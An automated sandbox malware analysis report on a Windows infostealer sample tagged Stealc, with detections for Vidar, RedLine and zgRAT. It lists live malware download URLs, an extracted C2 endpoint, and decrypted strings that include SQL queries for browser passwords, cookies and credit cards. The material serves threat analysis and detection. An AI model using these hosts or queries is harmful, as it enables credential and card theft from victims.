Windows Analysis Report
kO1P1YnLst.exe

Overview

General Information

Sample name: kO1P1YnLst.exe
renamed because original name is a hash value
Original sample name: 18d635dbc4392c2470eb97d1063e8484.exe
Analysis ID: 1432397
MD5: 18d635dbc4392c2470eb97d1063e8484
SHA1: b4bd20a549e40d8b946a9bf5439004e6111100f9
SHA256: 38b68616e12f54f0ed94d719751a9534394f3435ef49fe967c1bba3d62d1a67f
Tags: 32exeStealc
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
Name Description Attribution Blogpost URLs Link
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://185.172.128.59/syncUpd.exe Avira URL Cloud: Label: malware
Source: http://185.172.128.203/tiktok.exe Avira URL Cloud: Label: malware
Source: http://185.172.128.228/ping.php?substr=eight Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\pasb Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\khjsru Avira: detection malicious, Label: HEUR/AGEN.1307453
Found malware configuration
Source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\khjsru ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\pasb ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll ReversingLabs: Detection: 18%
Multi AV Scanner detection for submitted file
Source: kO1P1YnLst.exe ReversingLabs: Detection: 50%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\pasb Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\khjsru Joe Sandbox ML: detected
Machine Learning detection for sample
Source: kO1P1YnLst.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: lstrcatA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: OpenEventA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CreateEventA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CloseHandle
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Sleep
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: VirtualFree
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: lstrlenA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ExitProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: user32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CreateDCA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sscanf
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: HAL9TH
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: JohnDoe
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: DISPLAY
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: http://185.172.128.76
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: /3cd2b41cbde8fc9c.php
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: /15f649199f40275b/
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: default10
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GlobalLock
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: HeapFree
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetFileSize
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GlobalSize
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Process32Next
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Process32First
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: LocalFree
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: FindClose
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ReadFile
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: WriteFile
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CreateFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CopyFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetLastError
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GlobalFree
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: OpenProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ole32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: wininet.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: shell32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: psapi.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SelectObject
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: BitBlt
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: DeleteObject
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GdipFree
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CoInitialize
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetDC
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CloseWindow
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: wsprintfA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CharToOemW
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: wsprintfW
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: StrStrA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: StrCmpCW
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: PathMatchSpecA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: GetModuleFileNameExA
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RmStartSession
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RmRegisterResources
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RmGetList
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: RmEndSession
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_open
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_step
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_column_text
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_finalize
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_close
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_column_bytes
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: sqlite3_column_blob
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: encrypted_key
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: PATH
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: NSS_Init
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: NSS_Shutdown
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: PK11_FreeSlot
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: PK11_Authenticate
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: C:\ProgramData\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: browser:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: profile:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: url:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: login:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: password:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Opera
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: OperaGX
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Network
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: cookies
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: .txt
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: TRUE
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: FALSE
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: autofill
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: history
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: name:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: month:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: year:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: card:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Cookies
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Login Data
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Web Data
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: History
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: logins.json
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: formSubmitURL
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: usernameField
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: encryptedUsername
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: encryptedPassword
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: guid
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: cookies.sqlite
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: formhistory.sqlite
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: places.sqlite
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: plugins
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Local Extension Settings
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Sync Extension Settings
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: IndexedDB
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Opera Stable
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Opera GX Stable
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: CURRENT
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: chrome-extension_
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Local State
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: profiles.ini
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: chrome
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: opera
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: firefox
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: wallets
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %08lX%04lX%lu
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ProductName
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: ProcessorNameString
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: DisplayName
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: DisplayVersion
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Network Info:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - IP: IP?
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Country: ISO?
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: System Summary:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - HWID:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - OS:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Architecture:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - UserName:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Computer Name:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Local Time:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - UTC:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Language:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Keyboards:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Laptop:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Running Path:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - CPU:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Threads:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Cores:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - RAM:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - Display Resolution:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: - GPU:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: User Agents:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Installed Apps:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: All Users:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Current User:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: Process List:
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: system_info.txt
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: nss3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: \Temp\
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: .exe
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: runas
Source: 1.2.u5c4.0.exe.400000.0.unpack String decryptor: open
